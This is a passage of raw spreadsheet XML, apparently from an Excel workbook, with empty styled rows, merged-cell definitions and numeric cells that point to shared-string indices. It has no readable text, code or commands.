      <c r="A971" s="61"/>
      <c r="B971" s="82"/>
      <c r="D971" s="82"/>
      <c r="F971" s="82"/>
      <c r="H971" s="82"/>
      <c r="J971" s="82"/>
      <c r="L971" s="79"/>
      <c r="Q971" s="81"/>
      <c r="R971" s="81"/>
      <c r="S971" s="81"/>
      <c r="T971" s="81"/>
      <c r="U971" s="81"/>
      <c r="V971" s="81"/>
    </row>
    <row r="972">
      <c r="A972" s="61"/>
      <c r="B972" s="82"/>
      <c r="D972" s="82"/>
      <c r="F972" s="82"/>
      <c r="H972" s="82"/>
      <c r="J972" s="82"/>
      <c r="L972" s="79"/>
      <c r="Q972" s="81"/>
      <c r="R972" s="81"/>
      <c r="S972" s="81"/>
      <c r="T972" s="81"/>
      <c r="U972" s="81"/>
      <c r="V972" s="81"/>
    </row>
    <row r="973">
      <c r="A973" s="61"/>
      <c r="B973" s="82"/>
      <c r="D973" s="82"/>
      <c r="F973" s="82"/>
      <c r="H973" s="82"/>
      <c r="J973" s="82"/>
      <c r="L973" s="79"/>
      <c r="Q973" s="81"/>
      <c r="R973" s="81"/>
      <c r="S973" s="81"/>
      <c r="T973" s="81"/>
      <c r="U973" s="81"/>
      <c r="V973" s="81"/>
    </row>
    <row r="974">
      <c r="A974" s="61"/>
      <c r="B974" s="82"/>
      <c r="D974" s="82"/>
      <c r="F974" s="82"/>
      <c r="H974" s="82"/>
      <c r="J974" s="82"/>
      <c r="L974" s="79"/>
      <c r="Q974" s="81"/>
      <c r="R974" s="81"/>
      <c r="S974" s="81"/>
      <c r="T974" s="81"/>
      <c r="U974" s="81"/>
      <c r="V974" s="81"/>
    </row>
    <row r="975">
      <c r="A975" s="61"/>
      <c r="B975" s="82"/>
      <c r="D975" s="82"/>
      <c r="F975" s="82"/>
      <c r="H975" s="82"/>
      <c r="J975" s="82"/>
      <c r="L975" s="79"/>
      <c r="Q975" s="81"/>
      <c r="R975" s="81"/>
      <c r="S975" s="81"/>
      <c r="T975" s="81"/>
      <c r="U975" s="81"/>
      <c r="V975" s="81"/>
    </row>
    <row r="976">
      <c r="A976" s="61"/>
      <c r="B976" s="82"/>
      <c r="D976" s="82"/>
      <c r="F976" s="82"/>
      <c r="H976" s="82"/>
      <c r="J976" s="82"/>
      <c r="L976" s="79"/>
      <c r="Q976" s="81"/>
      <c r="R976" s="81"/>
      <c r="S976" s="81"/>
      <c r="T976" s="81"/>
      <c r="U976" s="81"/>
      <c r="V976" s="81"/>
    </row>
    <row r="977">
      <c r="A977" s="61"/>
      <c r="B977" s="82"/>
      <c r="D977" s="82"/>
      <c r="F977" s="82"/>
      <c r="H977" s="82"/>
      <c r="J977" s="82"/>
      <c r="L977" s="79"/>
      <c r="Q977" s="81"/>
      <c r="R977" s="81"/>
      <c r="S977" s="81"/>
      <c r="T977" s="81"/>
      <c r="U977" s="81"/>
      <c r="V977" s="81"/>
    </row>
    <row r="978">
      <c r="A978" s="61"/>
      <c r="B978" s="82"/>
      <c r="D978" s="82"/>
      <c r="F978" s="82"/>
      <c r="H978" s="82"/>
      <c r="J978" s="82"/>
      <c r="L978" s="79"/>
      <c r="Q978" s="81"/>
      <c r="R978" s="81"/>
      <c r="S978" s="81"/>
      <c r="T978" s="81"/>
      <c r="U978" s="81"/>
      <c r="V978" s="81"/>
    </row>
    <row r="979">
      <c r="A979" s="61"/>
      <c r="B979" s="82"/>
      <c r="D979" s="82"/>
      <c r="F979" s="82"/>
      <c r="H979" s="82"/>
      <c r="J979" s="82"/>
      <c r="L979" s="79"/>
      <c r="Q979" s="81"/>
      <c r="R979" s="81"/>
      <c r="S979" s="81"/>
      <c r="T979" s="81"/>
      <c r="U979" s="81"/>
      <c r="V979" s="81"/>
    </row>
    <row r="980">
      <c r="A980" s="61"/>
      <c r="B980" s="82"/>
      <c r="D980" s="82"/>
      <c r="F980" s="82"/>
      <c r="H980" s="82"/>
      <c r="J980" s="82"/>
      <c r="L980" s="79"/>
      <c r="Q980" s="81"/>
      <c r="R980" s="81"/>
      <c r="S980" s="81"/>
      <c r="T980" s="81"/>
      <c r="U980" s="81"/>
      <c r="V980" s="81"/>
    </row>
    <row r="981">
      <c r="A981" s="61"/>
      <c r="B981" s="82"/>
      <c r="D981" s="82"/>
      <c r="F981" s="82"/>
      <c r="H981" s="82"/>
      <c r="J981" s="82"/>
      <c r="L981" s="79"/>
      <c r="Q981" s="81"/>
      <c r="R981" s="81"/>
      <c r="S981" s="81"/>
      <c r="T981" s="81"/>
      <c r="U981" s="81"/>
      <c r="V981" s="81"/>
    </row>
    <row r="982">
      <c r="A982" s="61"/>
      <c r="B982" s="82"/>
      <c r="D982" s="82"/>
      <c r="F982" s="82"/>
      <c r="H982" s="82"/>
      <c r="J982" s="82"/>
      <c r="L982" s="79"/>
      <c r="Q982" s="81"/>
      <c r="R982" s="81"/>
      <c r="S982" s="81"/>
      <c r="T982" s="81"/>
      <c r="U982" s="81"/>
      <c r="V982" s="81"/>
    </row>
    <row r="983">
      <c r="A983" s="61"/>
      <c r="B983" s="82"/>
      <c r="D983" s="82"/>
      <c r="F983" s="82"/>
      <c r="H983" s="82"/>
      <c r="J983" s="82"/>
      <c r="L983" s="79"/>
      <c r="Q983" s="81"/>
      <c r="R983" s="81"/>
      <c r="S983" s="81"/>
      <c r="T983" s="81"/>
      <c r="U983" s="81"/>
      <c r="V983" s="81"/>
    </row>
    <row r="984">
      <c r="A984" s="61"/>
      <c r="B984" s="82"/>
      <c r="D984" s="82"/>
      <c r="F984" s="82"/>
      <c r="H984" s="82"/>
      <c r="J984" s="82"/>
      <c r="L984" s="79"/>
      <c r="Q984" s="81"/>
      <c r="R984" s="81"/>
      <c r="S984" s="81"/>
      <c r="T984" s="81"/>
      <c r="U984" s="81"/>
      <c r="V984" s="81"/>
    </row>
    <row r="985">
      <c r="A985" s="61"/>
      <c r="B985" s="82"/>
      <c r="D985" s="82"/>
      <c r="F985" s="82"/>
      <c r="H985" s="82"/>
      <c r="J985" s="82"/>
      <c r="L985" s="79"/>
      <c r="Q985" s="81"/>
      <c r="R985" s="81"/>
      <c r="S985" s="81"/>
      <c r="T985" s="81"/>
      <c r="U985" s="81"/>
      <c r="V985" s="81"/>
    </row>
    <row r="986">
      <c r="A986" s="61"/>
      <c r="B986" s="82"/>
      <c r="D986" s="82"/>
      <c r="F986" s="82"/>
      <c r="H986" s="82"/>
      <c r="J986" s="82"/>
      <c r="L986" s="79"/>
      <c r="Q986" s="81"/>
      <c r="R986" s="81"/>
      <c r="S986" s="81"/>
      <c r="T986" s="81"/>
      <c r="U986" s="81"/>
      <c r="V986" s="81"/>
    </row>
    <row r="987">
      <c r="A987" s="61"/>
      <c r="B987" s="82"/>
      <c r="D987" s="82"/>
      <c r="F987" s="82"/>
      <c r="H987" s="82"/>
      <c r="J987" s="82"/>
      <c r="L987" s="79"/>
      <c r="Q987" s="81"/>
      <c r="R987" s="81"/>
      <c r="S987" s="81"/>
      <c r="T987" s="81"/>
      <c r="U987" s="81"/>
      <c r="V987" s="81"/>
    </row>
    <row r="988">
      <c r="A988" s="61"/>
      <c r="B988" s="82"/>
      <c r="D988" s="82"/>
      <c r="F988" s="82"/>
      <c r="H988" s="82"/>
      <c r="J988" s="82"/>
      <c r="L988" s="79"/>
      <c r="Q988" s="81"/>
      <c r="R988" s="81"/>
      <c r="S988" s="81"/>
      <c r="T988" s="81"/>
      <c r="U988" s="81"/>
      <c r="V988" s="81"/>
    </row>
    <row r="989">
      <c r="A989" s="61"/>
      <c r="B989" s="82"/>
      <c r="D989" s="82"/>
      <c r="F989" s="82"/>
      <c r="H989" s="82"/>
      <c r="J989" s="82"/>
      <c r="L989" s="79"/>
      <c r="Q989" s="81"/>
      <c r="R989" s="81"/>
      <c r="S989" s="81"/>
      <c r="T989" s="81"/>
      <c r="U989" s="81"/>
      <c r="V989" s="81"/>
    </row>
    <row r="990">
      <c r="A990" s="61"/>
      <c r="B990" s="82"/>
      <c r="D990" s="82"/>
      <c r="F990" s="82"/>
      <c r="H990" s="82"/>
      <c r="J990" s="82"/>
      <c r="L990" s="79"/>
      <c r="Q990" s="81"/>
      <c r="R990" s="81"/>
      <c r="S990" s="81"/>
      <c r="T990" s="81"/>
      <c r="U990" s="81"/>
      <c r="V990" s="81"/>
    </row>
    <row r="991">
      <c r="A991" s="61"/>
      <c r="B991" s="82"/>
      <c r="D991" s="82"/>
      <c r="F991" s="82"/>
      <c r="H991" s="82"/>
      <c r="J991" s="82"/>
      <c r="L991" s="79"/>
      <c r="Q991" s="81"/>
      <c r="R991" s="81"/>
      <c r="S991" s="81"/>
      <c r="T991" s="81"/>
      <c r="U991" s="81"/>
      <c r="V991" s="81"/>
    </row>
    <row r="992">
      <c r="A992" s="61"/>
      <c r="B992" s="82"/>
      <c r="D992" s="82"/>
      <c r="F992" s="82"/>
      <c r="H992" s="82"/>
      <c r="J992" s="82"/>
      <c r="L992" s="79"/>
      <c r="Q992" s="81"/>
      <c r="R992" s="81"/>
      <c r="S992" s="81"/>
      <c r="T992" s="81"/>
      <c r="U992" s="81"/>
      <c r="V992" s="81"/>
    </row>
    <row r="993">
      <c r="A993" s="61"/>
      <c r="B993" s="82"/>
      <c r="D993" s="82"/>
      <c r="F993" s="82"/>
      <c r="H993" s="82"/>
      <c r="J993" s="82"/>
      <c r="L993" s="79"/>
      <c r="Q993" s="81"/>
      <c r="R993" s="81"/>
      <c r="S993" s="81"/>
      <c r="T993" s="81"/>
      <c r="U993" s="81"/>
      <c r="V993" s="81"/>
    </row>
    <row r="994">
      <c r="A994" s="61"/>
      <c r="B994" s="82"/>
      <c r="D994" s="82"/>
      <c r="F994" s="82"/>
      <c r="H994" s="82"/>
      <c r="J994" s="82"/>
      <c r="L994" s="79"/>
      <c r="Q994" s="81"/>
      <c r="R994" s="81"/>
      <c r="S994" s="81"/>
      <c r="T994" s="81"/>
      <c r="U994" s="81"/>
      <c r="V994" s="81"/>
    </row>
    <row r="995">
      <c r="A995" s="61"/>
      <c r="B995" s="82"/>
      <c r="D995" s="82"/>
      <c r="F995" s="82"/>
      <c r="H995" s="82"/>
      <c r="J995" s="82"/>
      <c r="L995" s="79"/>
      <c r="Q995" s="81"/>
      <c r="R995" s="81"/>
      <c r="S995" s="81"/>
      <c r="T995" s="81"/>
      <c r="U995" s="81"/>
      <c r="V995" s="81"/>
    </row>
    <row r="996">
      <c r="A996" s="61"/>
      <c r="B996" s="82"/>
      <c r="D996" s="82"/>
      <c r="F996" s="82"/>
      <c r="H996" s="82"/>
      <c r="J996" s="82"/>
      <c r="L996" s="79"/>
      <c r="Q996" s="81"/>
      <c r="R996" s="81"/>
      <c r="S996" s="81"/>
      <c r="T996" s="81"/>
      <c r="U996" s="81"/>
      <c r="V996" s="81"/>
    </row>
    <row r="997">
      <c r="A997" s="61"/>
      <c r="B997" s="82"/>
      <c r="D997" s="82"/>
      <c r="F997" s="82"/>
      <c r="H997" s="82"/>
      <c r="J997" s="82"/>
      <c r="L997" s="79"/>
      <c r="Q997" s="81"/>
      <c r="R997" s="81"/>
      <c r="S997" s="81"/>
      <c r="T997" s="81"/>
      <c r="U997" s="81"/>
      <c r="V997" s="81"/>
    </row>
    <row r="998">
      <c r="A998" s="61"/>
      <c r="B998" s="82"/>
      <c r="D998" s="82"/>
      <c r="F998" s="82"/>
      <c r="H998" s="82"/>
      <c r="J998" s="82"/>
      <c r="L998" s="79"/>
      <c r="Q998" s="81"/>
      <c r="R998" s="81"/>
      <c r="S998" s="81"/>
      <c r="T998" s="81"/>
      <c r="U998" s="81"/>
      <c r="V998" s="81"/>
    </row>
    <row r="999">
      <c r="A999" s="61"/>
      <c r="B999" s="82"/>
      <c r="D999" s="82"/>
      <c r="F999" s="82"/>
      <c r="H999" s="82"/>
      <c r="J999" s="82"/>
      <c r="L999" s="79"/>
      <c r="Q999" s="81"/>
      <c r="R999" s="81"/>
      <c r="S999" s="81"/>
      <c r="T999" s="81"/>
      <c r="U999" s="81"/>
      <c r="V999" s="81"/>
    </row>
    <row r="1000">
      <c r="A1000" s="61"/>
      <c r="B1000" s="82"/>
      <c r="D1000" s="82"/>
      <c r="F1000" s="82"/>
      <c r="H1000" s="82"/>
      <c r="J1000" s="82"/>
      <c r="L1000" s="79"/>
      <c r="Q1000" s="81"/>
      <c r="R1000" s="81"/>
      <c r="S1000" s="81"/>
      <c r="T1000" s="81"/>
      <c r="U1000" s="81"/>
      <c r="V1000" s="81"/>
    </row>
    <row r="1001">
      <c r="A1001" s="61"/>
      <c r="B1001" s="82"/>
      <c r="D1001" s="82"/>
      <c r="F1001" s="82"/>
      <c r="H1001" s="82"/>
      <c r="J1001" s="82"/>
      <c r="L1001" s="79"/>
      <c r="Q1001" s="81"/>
      <c r="R1001" s="81"/>
      <c r="S1001" s="81"/>
      <c r="T1001" s="81"/>
      <c r="U1001" s="81"/>
      <c r="V1001" s="81"/>
    </row>
  </sheetData>
  <mergeCells count="21">
    <mergeCell ref="B1:C1"/>
    <mergeCell ref="D1:E1"/>
    <mergeCell ref="F1:G1"/>
    <mergeCell ref="H1:I1"/>
    <mergeCell ref="J1:K1"/>
    <mergeCell ref="M1:T1"/>
    <mergeCell ref="O3:O5"/>
    <mergeCell ref="N13:N14"/>
    <mergeCell ref="O13:O14"/>
    <mergeCell ref="N23:N25"/>
    <mergeCell ref="N26:N27"/>
    <mergeCell ref="N28:N29"/>
    <mergeCell ref="N30:N32"/>
    <mergeCell ref="N33:N34"/>
    <mergeCell ref="N3:N5"/>
    <mergeCell ref="N6:N7"/>
    <mergeCell ref="O6:O7"/>
    <mergeCell ref="N8:N9"/>
    <mergeCell ref="O8:O9"/>
    <mergeCell ref="N10:N12"/>
    <mergeCell ref="O10:O1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9.0"/>
    <col customWidth="1" min="3" max="3" width="38.25"/>
    <col customWidth="1" min="4" max="4" width="47.13"/>
    <col customWidth="1" min="5" max="5" width="37.63"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="96" t="s">
        <v>116</v>
      </c>
      <c r="B1" s="97" t="s">
        <v>117</v>
      </c>
      <c r="C1" s="98" t="s">
        <v>3150</v>
      </c>
      <c r="D1" s="99" t="s">
        <v>3151</v>
      </c>
      <c r="E1" s="100" t="s">
        <v>3152</v>
      </c>
      <c r="F1" s="61"/>
      <c r="G1" s="61"/>
      <c r="H1" s="61"/>
      <c r="I1" s="61"/>
      <c r="J1" s="61"/>
      <c r="K1" s="61"/>
      <c r="L1" s="61"/>
    </row>
    <row r="2">
      <c r="A2" s="101">
        <v>208.0</v>
      </c>
      <c r="B2" s="102" t="s">
        <v>5</v>
      </c>
      <c r="C2" s="103" t="s">
        <v>143</v>
      </c>
      <c r="D2" s="104" t="s">
        <v>3015</v>
      </c>
      <c r="E2" s="105" t="s">
        <v>3153</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="106">
        <v>389.0</v>
      </c>
      <c r="B3" s="107" t="s">
        <v>5</v>
      </c>
      <c r="C3" s="108" t="s">
        <v>147</v>
      </c>
      <c r="D3" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E3" s="110" t="s">
        <v>3154</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="101">
        <v>459.0</v>
      </c>
      <c r="B4" s="102" t="s">
        <v>5</v>
      </c>
      <c r="C4" s="103" t="s">
        <v>151</v>
      </c>
      <c r="D4" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E4" s="105" t="s">
        <v>3155</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="106">
        <v>17.0</v>
      </c>
      <c r="B5" s="107" t="s">
        <v>8</v>
      </c>
      <c r="C5" s="108" t="s">
        <v>163</v>
      </c>
      <c r="D5" s="109" t="s">
        <v>3015</v>
      </c>
      <c r="E5" s="110" t="s">
        <v>3156</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="101">
        <v>94.0</v>
      </c>
      <c r="B6" s="102" t="s">
        <v>8</v>
      </c>
      <c r="C6" s="103" t="s">
        <v>166</v>
      </c>
      <c r="D6" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E6" s="105" t="s">
        <v>3157</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="106">
        <v>120.0</v>
      </c>
      <c r="B7" s="107" t="s">
        <v>8</v>
      </c>
      <c r="C7" s="108" t="s">
        <v>170</v>
      </c>
      <c r="D7" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E7" s="110" t="s">
        <v>3158</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="101">
        <v>4492.0</v>
      </c>
      <c r="B8" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C8" s="103" t="s">
        <v>173</v>
      </c>
      <c r="D8" s="104" t="s">
        <v>3038</v>
      </c>
      <c r="E8" s="105" t="s">
        <v>3159</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="106">
        <v>4531.0</v>
      </c>
      <c r="B9" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C9" s="108" t="s">
        <v>177</v>
      </c>
      <c r="D9" s="109" t="s">
        <v>2960</v>
      </c>
      <c r="E9" s="110" t="s">
        <v>3160</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="101">
        <v>4541.0</v>
      </c>
      <c r="B10" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C10" s="103" t="s">
        <v>181</v>
      </c>
      <c r="D10" s="104" t="s">
        <v>3015</v>
      </c>
      <c r="E10" s="105" t="s">
        <v>3161</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="106">
        <v>4573.0</v>
      </c>
      <c r="B11" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C11" s="108" t="s">
        <v>188</v>
      </c>
      <c r="D11" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E11" s="110" t="s">
        <v>3162</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="101">
        <v>4781.0</v>
      </c>
      <c r="B12" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C12" s="103" t="s">
        <v>192</v>
      </c>
      <c r="D12" s="104" t="s">
        <v>3001</v>
      </c>
      <c r="E12" s="105" t="s">
        <v>3163</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="106">
        <v>4907.0</v>
      </c>
      <c r="B13" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C13" s="108" t="s">
        <v>195</v>
      </c>
      <c r="D13" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E13" s="110" t="s">
        <v>3164</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="101">
        <v>4910.0</v>
      </c>
      <c r="B14" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C14" s="103" t="s">
        <v>201</v>
      </c>
      <c r="D14" s="104" t="s">
        <v>2953</v>
      </c>
      <c r="E14" s="105" t="s">
        <v>3165</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="106">
        <v>4943.0</v>
      </c>
      <c r="B15" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C15" s="108" t="s">
        <v>205</v>
      </c>
      <c r="D15" s="109" t="s">
        <v>3042</v>
      </c>
      <c r="E15" s="110" t="s">
        <v>3166</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="101">
        <v>5028.0</v>
      </c>
      <c r="B16" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C16" s="103" t="s">
        <v>208</v>
      </c>
      <c r="D16" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E16" s="105" t="s">
        <v>3167</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="106">
        <v>5046.0</v>
      </c>
      <c r="B17" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C17" s="108" t="s">
        <v>212</v>
      </c>
      <c r="D17" s="109" t="s">
        <v>2960</v>
      </c>
      <c r="E17" s="110" t="s">
        <v>3168</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="101">
        <v>5081.0</v>
      </c>
      <c r="B18" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C18" s="103" t="s">
        <v>215</v>
      </c>
      <c r="D18" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E18" s="105" t="s">
        <v>3169</v>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="106">
        <v>5099.0</v>
      </c>
      <c r="B19" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C19" s="108" t="s">
        <v>222</v>
      </c>
      <c r="D19" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E19" s="110" t="s">
        <v>3170</v>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="101">
        <v>5478.0</v>
      </c>
      <c r="B20" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C20" s="103" t="s">
        <v>229</v>
      </c>
      <c r="D20" s="104" t="s">
        <v>3008</v>
      </c>
      <c r="E20" s="105" t="s">
        <v>3171</v>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="106">
        <v>5528.0</v>
      </c>
      <c r="B21" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C21" s="108" t="s">
        <v>233</v>
      </c>
      <c r="D21" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E21" s="110" t="s">
        <v>3172</v>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="101">
        <v>5717.0</v>
      </c>
      <c r="B22" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C22" s="103" t="s">
        <v>237</v>
      </c>
      <c r="D22" s="104" t="s">
        <v>2960</v>
      </c>
      <c r="E22" s="105" t="s">
        <v>3173</v>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="106">
        <v>5882.0</v>
      </c>
      <c r="B23" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C23" s="108" t="s">
        <v>245</v>
      </c>
      <c r="D23" s="109" t="s">
        <v>2960</v>
      </c>
      <c r="E23" s="110" t="s">
        <v>3174</v>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="101">
        <v>5964.0</v>
      </c>
      <c r="B24" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C24" s="103" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="104" t="s">
        <v>3001</v>
      </c>
      <c r="E24" s="105" t="s">
        <v>3175</v>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="106">
        <v>5983.0</v>
      </c>
      <c r="B25" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C25" s="108" t="s">
        <v>252</v>
      </c>
      <c r="D25" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E25" s="110" t="s">
        <v>3176</v>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="101">
        <v>6049.0</v>
      </c>
      <c r="B26" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C26" s="103" t="s">
        <v>256</v>
      </c>
      <c r="D26" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E26" s="105" t="s">
        <v>3177</v>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="106">
        <v>6225.0</v>
      </c>
      <c r="B27" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C27" s="108" t="s">
        <v>264</v>
      </c>
      <c r="D27" s="109" t="s">
        <v>2960</v>
      </c>
      <c r="E27" s="110" t="s">
        <v>3178</v>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="101">
        <v>6267.0</v>
      </c>
      <c r="B28" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C28" s="103" t="s">
        <v>268</v>
      </c>
      <c r="D28" s="104" t="s">
        <v>2960</v>
      </c>
      <c r="E28" s="105" t="s">
        <v>3179</v>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="106">
        <v>6309.0</v>
      </c>
      <c r="B29" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C29" s="108" t="s">
        <v>272</v>
      </c>
      <c r="D29" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E29" s="110" t="s">
        <v>3180</v>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="101">
        <v>6342.0</v>
      </c>
      <c r="B30" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C30" s="103" t="s">
        <v>281</v>
      </c>
      <c r="D30" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E30" s="105" t="s">
        <v>3181</v>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="106">
        <v>6362.0</v>
      </c>
      <c r="B31" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C31" s="108" t="s">
        <v>284</v>
      </c>
      <c r="D31" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E31" s="110" t="s">
        <v>3182</v>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="101">
        <v>6365.0</v>
      </c>
      <c r="B32" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C32" s="103" t="s">
        <v>288</v>
      </c>
      <c r="D32" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E32" s="105" t="s">
        <v>3183</v>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="106">
        <v>6433.0</v>
      </c>
      <c r="B33" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C33" s="108" t="s">
        <v>294</v>
      </c>
      <c r="D33" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E33" s="110" t="s">
        <v>3184</v>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="101">
        <v>6460.0</v>
      </c>
      <c r="B34" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C34" s="103" t="s">
        <v>297</v>
      </c>
      <c r="D34" s="104" t="s">
        <v>3015</v>
      </c>
      <c r="E34" s="105" t="s">
        <v>3185</v>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="106">
        <v>6492.0</v>
      </c>
      <c r="B35" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C35" s="108" t="s">
        <v>306</v>
      </c>
      <c r="D35" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E35" s="110" t="s">
        <v>3186</v>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="101">
        <v>6498.0</v>
      </c>
      <c r="B36" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C36" s="103" t="s">
        <v>309</v>
      </c>
      <c r="D36" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E36" s="105" t="s">
        <v>3187</v>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="106">
        <v>6520.0</v>
      </c>
      <c r="B37" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C37" s="108" t="s">
        <v>312</v>
      </c>
      <c r="D37" s="109" t="s">
        <v>3008</v>
      </c>
      <c r="E37" s="110" t="s">
        <v>3188</v>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="101">
        <v>6630.0</v>
      </c>
      <c r="B38" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C38" s="103" t="s">
        <v>315</v>
      </c>
      <c r="D38" s="104" t="s">
        <v>3008</v>
      </c>
      <c r="E38" s="105" t="s">
        <v>3189</v>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="106">
        <v>7063.0</v>
      </c>
      <c r="B39" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C39" s="108" t="s">
        <v>321</v>
      </c>
      <c r="D39" s="109" t="s">
        <v>2960</v>
      </c>
      <c r="E39" s="110" t="s">
        <v>3190</v>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="101">
        <v>7191.0</v>
      </c>
      <c r="B40" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C40" s="103" t="s">
        <v>324</v>
      </c>
      <c r="D40" s="104" t="s">
        <v>3015</v>
      </c>
      <c r="E40" s="105" t="s">
        <v>3191</v>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="106">
        <v>7243.0</v>
      </c>
      <c r="B41" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C41" s="108" t="s">
        <v>327</v>
      </c>
      <c r="D41" s="109" t="s">
        <v>3001</v>
      </c>
      <c r="E41" s="110" t="s">
        <v>3192</v>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="101">
        <v>7264.0</v>
      </c>
      <c r="B42" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C42" s="103" t="s">
        <v>330</v>
      </c>
      <c r="D42" s="104" t="s">
        <v>3015</v>
      </c>
      <c r="E42" s="105" t="s">
        <v>3193</v>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="106">
        <v>7665.0</v>
      </c>
      <c r="B43" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C43" s="108" t="s">
        <v>333</v>
      </c>
      <c r="D43" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E43" s="110" t="s">
        <v>3194</v>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="101">
        <v>7798.0</v>
      </c>
      <c r="B44" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C44" s="103" t="s">
        <v>336</v>
      </c>
      <c r="D44" s="104" t="s">
        <v>2960</v>
      </c>
      <c r="E44" s="105" t="s">
        <v>3195</v>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="106">
        <v>8202.0</v>
      </c>
      <c r="B45" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C45" s="108" t="s">
        <v>339</v>
      </c>
      <c r="D45" s="109" t="s">
        <v>2960</v>
      </c>
      <c r="E45" s="110" t="s">
        <v>3196</v>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="101">
        <v>8305.0</v>
      </c>
      <c r="B46" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C46" s="103" t="s">
        <v>342</v>
      </c>
      <c r="D46" s="104" t="s">
        <v>2960</v>
      </c>
      <c r="E46" s="105" t="s">
        <v>3197</v>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="106">
        <v>8641.0</v>
      </c>
      <c r="B47" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C47" s="108" t="s">
        <v>345</v>
      </c>
